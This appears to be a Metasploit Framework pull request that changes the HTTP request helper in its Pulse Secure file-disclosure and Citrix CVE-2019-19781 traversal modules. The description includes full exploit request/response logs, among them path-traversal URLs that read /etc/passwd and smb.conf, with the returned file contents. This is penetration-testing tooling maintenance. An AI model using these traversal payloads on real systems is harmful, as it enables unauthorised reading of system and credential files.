### PR TITLE
Fix #12813, prefer send_request_cgi over send_request_raw

### DIFF
--- a/modules/auxiliary/gather/pulse_secure_file_disclosure.rb
+++ b/modules/auxiliary/gather/pulse_secure_file_disclosure.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Auxiliary
     files.each do |path, info|
       print_status("Dumping #{path}")
 
-      res = send_request_raw(
+      res = send_request_cgi(
         'method'  => 'GET',
         'uri'     => dir_traversal(path),
         'partial' => true # Allow partial response due to timeout

--- a/modules/auxiliary/scanner/http/citrix_dir_traversal.rb
+++ b/modules/auxiliary/scanner/http/citrix_dir_traversal.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(target_host)
     turi = normalize_uri(target_uri.path, datastore['PATH'])
 
-    res = send_request_raw(
+    res = send_request_cgi(
       'method' => 'GET',
       'uri'    =>  turi
     )


### PR DESCRIPTION
Fixes #12813 and more specifically https://github.com/rapid7/metasploit-framework/pull/12816#discussion_r366138969. The only tradition is CHAOS.

```
msf5 auxiliary(scanner/http/citrix_dir_traversal) > run

********************
####################
# Request:
####################
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 14 Jan 2020 06:40:03 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 12 Jan 2020 22:27:43 GMT
ETag: "53-59bf8de0ad5c0"
Accept-Ranges: bytes
Content-Length: 83
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain; charset=UTF-8

[global]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast

[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >
```

```
msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in manual mode
[*] Dumping /etc/passwd
********************
####################
# Request:
####################
GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: max-age=86400, must-revalidate
Last-Modified: Mon, 09 Sep 2019 15:10:05 GMT
Content-Length: 273
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

[+] /Users/wvu/.msf4/loot/20200114004238_default_[redacted]_PulseSecureVPN_774075.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) >
```

Note the only difference is `Content-Type: application/x-www-form-urlencoded`, and it isn't an issue for these vulns.